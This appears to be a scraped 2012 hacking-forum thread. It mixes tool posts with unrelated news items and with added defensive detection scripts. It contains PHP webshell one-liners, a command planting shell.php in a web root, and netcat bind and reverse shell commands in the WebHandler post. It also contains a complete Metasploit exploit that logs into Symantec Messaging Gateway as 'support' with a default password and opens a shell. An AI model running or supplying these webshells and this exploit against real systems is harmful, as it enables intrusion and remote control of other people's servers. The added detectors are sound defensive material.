red.format(choice(quotes)) elif option == '6': admin() aprint() print red.format(choice(quotes)) elif option == '7': subd() print red.format(choice(quotes)) elif option == '8': word() print red.format(choice(quotes)) elif option == '9': OnlineCrack().crack() print red.format(choice(quotes)) elif option == '10': Check().grab() print red.format(choice(quotes)) else: print '\nInvalid 
Choice\n' time.sleep(0.9) main() else: print '\nYou Must Enter An Option (Check if your typo is corrected.)\n' time.sleep(0.9) main() if __name__ == '__main__': main() download: http://secscan-py.googlecode.com/files/SecScan-v1.1b source
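Added example (not part of the original post or of SecScan): a defender-side check that looks for the request shapes this script produces in a web server access log, namely a parameter value ending in `'`, a value of `../`, the `<script>alert('xss')</script>` marker, a remote URL as the value, bursts of 404s on admin-style paths, and a client that rotates User-Agent strings. The log lines are constructed (combined log format assumed), and the thresholds and function names are illustrative.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
ADMIN_PATH = re.compile(r"admin|login|moderator|controlpanel", re.I)

# Constructed sample log; IPs are from the RFC 5737 documentation ranges.
SAMPLE_LOG = r'''
203.0.113.50 - - [14/Aug/2012:03:10:01 +0000] "GET /item.php?id=5' HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.0.113.50 - - [14/Aug/2012:03:10:02 +0000] "GET /view.php?page=../ HTTP/1.1" 200 740 "-" "YahooSeeker/1.2"
203.0.113.50 - - [14/Aug/2012:03:10:03 +0000] "GET /s.php?q=\"><script>alert('xss')</script> HTTP/1.1" 200 300 "-" "Mozilla/5.0 (X11; Linux) Firefox/3.6.7"
198.51.100.77 - - [14/Aug/2012:04:00:01 +0000] "GET /admin.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.77 - - [14/Aug/2012:04:00:01 +0000] "GET /admin/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.77 - - [14/Aug/2012:04:00:02 +0000] "GET /administrator/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.77 - - [14/Aug/2012:04:00:02 +0000] "GET /webadmin/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.77 - - [14/Aug/2012:04:00:03 +0000] "GET /wp-login.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
192.0.2.10 - - [14/Aug/2012:05:00:00 +0000] "GET /index.php?id=7 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
'''.strip().splitlines()


def classify(target):
    """Label a request target by the value of its last query parameter."""
    # Apache writes a literal double quote in the request line as \" .
    query = unquote(urlsplit(target).query).replace('\\"', '"')
    if not query:
        return None
    value = query.rsplit("=", 1)[-1]
    lowered = value.lower()
    if "<script>alert('xss')</script>" in lowered:
        return "xss-probe"
    if value == "../":
        return "lfi-probe"
    if re.match(r"(https?|ftp)://", lowered):
        return "rfi-probe"      # review: redirect parameters also look like this
    if value.endswith("'"):
        return "sqli-probe"
    return None


def scan_log(lines, admin_404_threshold=5, ua_threshold=3):
    """Return {ip: sorted list of findings} for the given log lines."""
    probes = defaultdict(set)
    admin_404 = defaultdict(int)
    agents = defaultdict(set)
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        ip = match["ip"]
        agents[ip].add(match["ua"])
        tag = classify(match["target"])
        if tag:
            probes[ip].add(tag)
        path = urlsplit(match["target"]).path
        if match["status"] == "404" and ADMIN_PATH.search(path):
            admin_404[ip] += 1

    findings = {}
    for ip in agents:
        tags = set(probes[ip])
        if admin_404[ip] >= admin_404_threshold:
            tags.add("admin-enum")
        # Many User-Agents alone is normal behind NAT; only report it
        # alongside another finding.
        if tags and len(agents[ip]) >= ua_threshold:
            tags.add("ua-rotation")
        if tags:
            findings[ip] = sorted(tags)
    return findings


if __name__ == "__main__":
    for ip, tags in sorted(scan_log(SAMPLE_LOG).items()):
        print(ip, ", ".join(tags))
```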
  17. Info

    WebHandler tries to simulate a 'Linux bash prompt' to handle and process:

    - PHP program execution functions _(e.g. `system`, `passthru`, `exec`, etc)_
    - Bind shell connections _(e.g. `nc <ip> <port>`)_
    - Reverse shell connections _(e.g. `nc -lvvp 1234`)_

    Another feature is to spoof the "User-Agent" field in the HTTP header (--random-agent). It also supports HTTP proxies (--proxy http://<ip>:<port>).

    WebHandler works for POST and GET requests:

        <?php system($_GET['cmd']); ?>
        <?php passthru($_REQUEST['cmd']); ?>
        <?php echo exec($_POST['cmd']); ?>

    WebHandler is a replacement for netcat connections.

    An example bind connection (e.g. nc -lvvp 1234 -e /bin/sh). Normally the user would do:

        netcat -l -p 1234
        nc -lvvp 1234

    An example reverse connection (e.g. nc 127.0.0.1 4321 -e /bin/sh). Normally the user would do:

        netcat -l -p 4321
        nc -lvvp 4321

    Usage

    Example file:

        echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php

    --url is a required argument when sending either GET or POST requests (e.g. a bind 'web based PHP' connection):

        python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=
        python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmd
        python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbo
        python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080

    --listen is a required argument when waiting for a connection (e.g. a reverse 'raw' connection):

        python webhandler.py --listen 1234

    Dependencies

    If your Python version is < 2.7.x, then argparse is required. To install it run:

        sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse

    OR

        sudo pip install argparse

    readline is optional. This module is used to provide elaborate line editing and history features.

    git is optional. This allows for the project to be kept up-to-date.

    Links: Wiki, Known Bugs, Download

    Source
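    The three PHP one-liners above are the pattern a defender has to find on a server. An added example (not part of WebHandler or of the original post): a Python 3 scanner that flags PHP source passing request parameters to program execution functions, either directly or through one intermediate variable. The function names beyond `system`, `passthru` and `exec`, the names `scan_php` and `SAMPLE`, and the sample source are assumptions constructed for illustration.

```python
import re

# Program execution functions named in the post, plus closely related ones
# (shell_exec, popen, proc_open are an assumption about what to cover).
EXEC_FUNCS = "system|passthru|exec|shell_exec|popen|proc_open"
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[\s*['\"]?(\w+)['\"]?\s*\]"
NOT_METHOD = r"(?<![\w>:$])"  # skip $db->exec(), Foo::exec(), curl_exec()

DIRECT = re.compile(NOT_METHOD + r"(%s)\s*\(\s*%s" % (EXEC_FUNCS, SUPERGLOBAL), re.I)
ASSIGN = re.compile(r"(\$\w+)\s*=\s*%s" % SUPERGLOBAL, re.I)
CALL_VAR = re.compile(NOT_METHOD + r"(%s)\s*\(\s*(\$\w+)" % EXEC_FUNCS, re.I)


def strip_comments(php):
    """Blank out /* */, // and # comments while keeping line numbers stable."""
    php = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n"),
                 php, flags=re.S)
    return re.sub(r"(?m)(?<!:)(?://|#)[^\n]*?(?=\?>|$)", "", php)


def scan_php(source):
    """Return sorted (line_no, function, request_parameter) findings."""
    findings = set()
    tainted = {}  # variable name -> request parameter it was copied from
    for no, line in enumerate(strip_comments(source).splitlines(), 1):
        for m in ASSIGN.finditer(line):
            tainted[m.group(1)] = m.group(2)
        for m in DIRECT.finditer(line):
            findings.add((no, m.group(1).lower(), m.group(2)))
        for m in CALL_VAR.finditer(line):
            if m.group(2) in tainted:
                findings.add((no, m.group(1).lower(), tainted[m.group(2)]))
    return sorted(findings)


# Constructed sample: one commented-out call, one direct call, one call
# through a variable, and a database method that must not be flagged.
SAMPLE = """<?php
// system($_GET['old']);  disabled
echo exec($_POST['cmd']);
$c = $_REQUEST["run"];
$db->exec($_GET['q']);
passthru($c);
?>"""

if __name__ == "__main__":
    for line_no, func, param in scan_php(SAMPLE):
        print("line %d: %s() receives request parameter '%s'" % (line_no, func, param))
```

    A finding is a lead for review, not proof of compromise; the one-hop variable tracking is line-ordered and will miss values passed through functions or includes.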
  18. Fi8sVrs

    jsTree

    jsTree is a javascript based, cross browser tree component. It is packaged as a jQuery plugin. jsTree is absolutely free (licensed same as jQuery – under the terms of either the MIT License or the GNU General Public License (GPL) Version 2).

    Features at a glance:

    - Various data sources - HTML, JSON, XML
    - Drag & drop support
    - Theme support + included themes
    - Optional keyboard navigation
    - Inline editing
    - Define node types and fine tune them
    - Optional checkbox tree support
    - Supports plugins
    - Supports AJAX loading
    - Highly configurable
    - Uses jQuery's event system
    - Maintain the same tree in many languages
    - Open/close optional animation
    - Configurable multitree drag & drop
    - Search function
    - Optional state saving using cookies

    Currently supported browsers are:

    - Internet Explorer 6+ *
    - Mozilla Firefox 2+
    - Safari 3+
    - Opera 9+
    - Google Chrome

    download

    source
  19. The university, which pioneered massive open online courses, unveils two new homegrown software platforms to host the courses. Fall quarter's free online courses cover a wide range of fields including computer science, mathematics, linguistics, science writing, sociology and education. Sixteen courses and two new platforms for interactive learning will highlight Stanford's free online offerings this fall, with more to follow during winter and spring quarters. From cryptography to science writing, technology entrepreneurship, finance and a crash course in creativity, the courses are open to anyone with a computer, anywhere. As the number of Stanford online courses has grown, so too has the range of fields, which now include computer science, mathematics, linguistics, science writing, sociology and education. Stanford is unique among universities in that it is offering its online courses on more than one platform. Each has its own distinct features and capabilities, among them video lectures, discussion forums, peer assessment, problem sets, quizzes and team projects. An open-source platform called Class2Go, developed by a team of Stanford engineers, will host An Introduction to Computer Networks, taught by Nick McKeown – an entrepreneur and a professor of electrical engineering and of computer science, whose networking startup, Nicira, was just acquired by VMware – and his colleague Philip Levis. Class2Go also will host a course on solar cells taught by physicist Bruce Clemens. Also notable is a team-based course, Technology Entrepreneurship, taught by Chuck Eesley, assistant professor of management science and engineering; the course garnered 37,000 students when it first appeared last spring. It is hosted on another new platform, Venture Lab, developed by Stanford faculty member Amin Saberi specifically for classes in which students work in teams. 
    The most widely available online learning platform, Coursera, will host nine Stanford courses this quarter, among them a new course, Writing in the Sciences, taught by epidemiologist Kristin Sainani, as well as Scott Klemmer's Human-Computer Interaction, which last spring enrolled around 29,000 students. Coursera was developed by two Stanford computer scientists who currently are on leave.

    Students interested in registering should go to the course websites listed below or to the Stanford Online website, where updates will be available as new courses appear.

    Here is a list of fall quarter classes, with instructor, course title, start date and platform:

    - Andrew Ng, Machine Learning, Aug. 20, Coursera https://www.coursera.org/course/ml
    - Dan Boneh, Cryptography, Aug. 27, Coursera https://www.coursera.org/course/crypto
    - Keith Devlin, Introduction to Mathematical Thinking, Sept. 17, Coursera https://www.coursera.org/course/maththink
    - Daphne Koller, Probabilistic Graphical Models, Sept. 24, Coursera https://www.coursera.org/course/pgm
    - Scott Klemmer, Human-Computer Interaction, Sept. 24, Coursera https://www.coursera.org/course/hci
    - Michael Genesereth, Introduction to Logic, Sept. 24, Coursera https://www.coursera.org/course/intrologic
    - Dan McFarland, Organizational Analysis, Sept. 24, Coursera https://www.coursera.org/course/organalysis
    - Kristin Sainani, Writing in the Sciences, Sept. 24, Coursera https://www.coursera.org/course/sciwrite
    - Tim Roughgarden, Algorithms: Design and Analysis, Part 2, October, Coursera https://www.coursera.org/course/algo2
    - Chuck Eesley, Technology Entrepreneurship, Fall, Venture Lab
    - Tina Seelig, A Crash Course on Creativity, Fall, Venture Lab
    - Paul Kim, Designing a New Learning Environment, Fall, Venture Lab
    - Kay Giesecke, Finance, Fall, Venture Lab
    - Clint Korver, Startup Boards: Advanced Entrepreneurship, Fall, Venture Lab
    - Bruce Clemens, Solar Cells, Fuel Cells and Batteries, Oct. 8, Class2Go http://solar.class.stanford.edu
    - Nick McKeown and Philip Levis, An Introduction to Computer Networks, Oct. 8, Class2Go http://networking.class.stanford.edu

    Source
  20. Sql Code Guard is a free addin for SSMS (2005/2008/2008R2)* that provides fast and comprehensive static analysis for T-Sql code, and shows code complexity and object dependencies.

    * Visual Studio 2010 and database projects are also supported.

    Great news! Now SqlCodeGuard provides a simple basic API to use its powerful analysis abilities in your custom solutions! (assembly and sample project included)

    Don't be shy - download Sql Code Guard 2.1.4634 (updated 2012-09-09) right now (changelog)

    Do you have any suggestions? Bug report? Feel free to contact me: SqlCodeGuard <at> gmail.com

    Code issues

    Want to be sure that your code is “best practice” compliant? Need to check for hidden pitfalls? There it is – the Code issues window! You can analyze a single script or the entire database with only a few mouse clicks! More than a hundred rules to check – from style to potential errors.

    Object dependencies

    Wondering who uses this table? Procedure? Function? Or maybe you want to know which procedures modify this table or view? Trying to avoid the well-known error 208? Want to know if you missed some objects? Object dependencies are right for you! Explore your database with a single mouse click!

    Code complexity

    Worried about your code? Does it seem too complex to understand? Find the complexity of your code! In combination with Code Outline you can quickly and easily find the most complex procedure or function in your database and review it.

    Code Outline

    Lost in your “too-complex-to-navigate” procedure? Use Code Outline for quick and simple navigation through the workflow of your code! Complexity analysis of each navigated statement is provided!

    SqlCodeGuard - free addin for SSMS for static T-Sql analysis
  21. http://www.youtube.com/watch?v=wCVwdvufTds

    Features

    - Live HTML/CSS/JS editing preview for Google Chrome — no more window-switching needed.
    - Google Closure Compiler JSDoc annotations support
    - Initial Jade templates support
    - Better JavaScript code completion (faster and smarter)
    - Lots of improvements for Sass/SCSS: better code completion, navigation, code formatting and support for advanced constructs
    - JSTestDriver tests debugging
    - Project-level JS libraries
    - and many other changes.

    System requirements

    - Microsoft Windows 7 (incl. 64-bit)/Vista/2003/XP/2000
    - Intel Pentium III/800 MHz or higher (or compatible)
    - 512 MB free RAM minimum
    - 1 GB RAM recommended
    - 1024x768 minimum screen resolution

    Instructions

    - Run the WebStorm-*.exe file that starts the Installation Wizard
    - Follow all steps suggested by the wizard. Please pay special attention to the corresponding installation options

    Download

    WebStorm 5.0 released: introduces Live Edit and Jade, better JSDoc and Sass/SCSS & more | WebStorm & PhpStorm Blog
  22. The Metropolitan Police have issued an urgent warning about a new ransom malware that is in circulation.

    Ransomware (also referred to in some cases as cryptoviruses, cryptotrojans or cryptoworms) comprises a class of malware which restricts access to the computer system that it infects, and demands a ransom paid to the creator of the malware in order for the restriction to be removed.

    Ransomware typically propagates like a conventional computer worm, entering a system through, for example, a downloaded file or a vulnerability in a network service. The program will then run a payload which will begin to encrypt personal files on the hard drive. More sophisticated ransomware may hybrid-encrypt the victim's plaintext with a random symmetric key and a fixed public key. The malware author is the only party that knows the needed private decryption key.

    Some ransomware payloads do not use encryption. In these cases, the payload is simply an application designed to effectively restrict interaction with the system, typically by overriding explorer.exe in the Windows registry as the default shell, or even by modifying the master boot record so that the operating system cannot start at all until it is repaired.

    We ask readers to share this article with friends on all social networks to alert them that this is a fraud; users are advised not to pay out any monies or hand out any bank details.

    Police advice -

    Modern ransomware attacks were initially popular within Russia, but in recent years there have been an increasing number of ransomware attacks targeted towards other countries, such as Australia, Germany, and the United States among others.

    In order to reduce the chances of being infected by this or similar malware, we strongly recommend using a good antivirus and always keeping your software updated so that potential vulnerabilities are patched.

    source
  23. This Metasploit module exploits a default misconfiguration flaw on Symantec Messaging Gateway. The 'support' user has a known default password, which can be used to login to the SSH service, and gain privileged access from remote.

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'
    require 'net/ssh'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Auxiliary::CommandShell

      def initialize(info={})
        super(update_info(info,
          'Name'           => "Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability",
          'Description'    => %q{
              This module exploits a default misconfiguration flaw on Symantec Messaging Gateway.
            The 'support' user has a known default password, which can be used to login to the
            SSH service, and gain privileged access from remote.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'Stefan Viehbock', #Original discovery
              'Ben Williams',    #Reporting the vuln + coordinated release
              'sinn3r'           #Metasploit
            ],
          'References'     =>
            [
              ['CVE', '2012-3579'],
              ['OSVDB', '85028'],
              ['BID', '55143'],
              ['URL', 'https://www.sec-consult.com/files/20120829-0_Symantec_Mail_Gateway_Support_Backdoor.txt'],
              ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00']
            ],
          'DefaultOptions' =>
            {
              'ExitFunction' => "none"
            },
          'Payload'        =>
            {
              'Compat' => {
                'PayloadType'    => 'cmd_interact',
                'ConnectionType' => 'find'
              }
            },
          'Platform'       => 'unix',
          'Arch'           => ARCH_CMD,
          'Targets'        =>
            [
              ['Symantec Messaging Gateway 9.5', {}],
            ],
          'Privileged'     => true,
          #Timestamp on Symantec advisory
          #But was found on Jun 26, 2012
          'DisclosureDate' => "Aug 27 2012",
          'DefaultTarget'  => 0))

        register_options(
          [
            Opt::RHOST(),
            Opt::RPORT(22)
          ], self.class
        )

        register_advanced_options(
          [
            OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
            OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
          ]
        )
      end

      def rhost
        datastore['RHOST']
      end

      def rport
        datastore['RPORT']
      end

      def do_login(user, pass)
        opts = {
          :auth_methods     => ['password', 'keyboard-interactive'],
          :msframework      => framework,
          :msfmodule        => self,
          :port             => rport,
          :disable_agent    => true,
          :config           => false,
          :password         => pass,
          :record_auth_info => true,
          :proxies          => datastore['Proxies']
        }

        opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

        begin
          ssh = nil
          ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
            ssh = Net::SSH.start(rhost, user, opts)
          end
        rescue Rex::ConnectionError, Rex::AddressInUse
          return
        rescue Net::SSH::Disconnect, ::EOFError
          print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
          return
        rescue ::Timeout::Error
          print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
          return
        rescue Net::SSH::AuthenticationFailed
          print_error "#{rhost}:#{rport} SSH - Failed authentication"
        rescue Net::SSH::Exception => e
          print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
          return
        end

        if ssh
          conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
          ssh = nil
          return conn
        end

        return nil
      end

      def exploit
        user = 'support'
        pass = 'symantec'
        print_status("#{rhost}:#{rport} - Attempt to login...")
        conn = do_login(user, pass)
        if conn
          print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'")
          handler(conn.lsock)
        end
      end

    end

    mirror

    source
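    Because the module logs in as `support` over SSH with password or keyboard-interactive authentication, those logins are visible in the SSH daemon's authentication log. An added example (not part of the Metasploit module or of the post): a Python 3 triage function that flags accepted interactive logins for that account from outside a management network and counts failed attempts per source. It assumes the standard OpenSSH syslog message format; the host name, addresses, log lines and the names `triage` and `SAMPLE_LOG` are constructed for illustration.

```python
import ipaddress
import re

# Standard OpenSSH syslog messages (assumed; the post shows no appliance logs).
AUTH = re.compile(
    r"sshd\[\d+\]: (Accepted|Failed) "
    r"(password|keyboard-interactive/pam|publickey) "
    r"for (?:invalid user )?(\S+) from (\S+) port \d+")

WATCHED_USER = "support"  # the account named in the module


def triage(lines, mgmt_networks=()):
    """Classify sshd events for the watched account.

    Returns (alerts, failures). alerts lists (source, method, timestamp+host)
    for accepted password or keyboard-interactive logins from outside
    mgmt_networks; failures counts failed attempts per source address.
    """
    nets = [ipaddress.ip_network(n) for n in mgmt_networks]
    alerts, failures = [], {}
    for line in lines:
        m = AUTH.search(line)
        if not m or m.group(3) != WATCHED_USER:
            continue
        outcome, method, src = m.group(1), m.group(2), m.group(4)
        if outcome == "Failed":
            failures[src] = failures.get(src, 0) + 1
            continue
        try:
            inside = any(ipaddress.ip_address(src) in n for n in nets)
        except ValueError:  # sshd logged a host name instead of an address
            inside = False
        if method != "publickey" and not inside:
            alerts.append((src, method, line.split(" sshd[")[0]))
    return alerts, failures


# Constructed log lines using documentation address ranges.
SAMPLE_LOG = [
    "Aug 28 09:14:02 smg sshd[2211]: Failed password for support from 203.0.113.7 port 40112 ssh2",
    "Aug 28 09:14:05 smg sshd[2211]: Accepted password for support from 203.0.113.7 port 40112 ssh2",
    "Aug 28 09:20:41 smg sshd[2290]: Accepted password for support from 192.0.2.10 port 51100 ssh2",
    "Aug 28 09:31:17 smg sshd[2302]: Accepted publickey for admin from 192.0.2.10 port 51140 ssh2",
    "Aug 28 09:40:00 smg sshd[2350]: Failed password for invalid user support from 198.51.100.9 port 2222 ssh2",
]

if __name__ == "__main__":
    found, failed = triage(SAMPLE_LOG, ["192.0.2.0/24"])
    for src, method, when in found:
        print("ALERT %s: %s login as %s from %s" % (when, method, WATCHED_USER, src))
    print("failed attempts by source:", failed)
```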
  24. "The Pirate Bay team is going to be making the RIAA angry, with the launch of a new ad-supported VPN service. PrivitizeVPN is available for free from The Pirate Bay. Instead of earning revenue through subscription as ipredator does, PrivitizeVPN comes packaged to install the Babylon search bar (adware). PrivitizeVPN appears to be available for Windows users only at the moment. The Pirate Bay staff has a long history of promoting services that have no logs; e.g., you can't get in trouble if your anonymized IP is subpoenaed by government officials. Although PrivitizeVPN is being released silently, with no press coverage, no official statement, and no comments from The Pirate Bay of any kind, people are assuming that PrivitizeVPN will have the same familiar data protection policies. A backup download location has been set up here for people who have limited access to the Pirate Bay domain."

    The Pirate Bay Launches Free VPN - Slashdot
  25. Fi8sVrs

    cPanels

    pastebin via r00tw0rm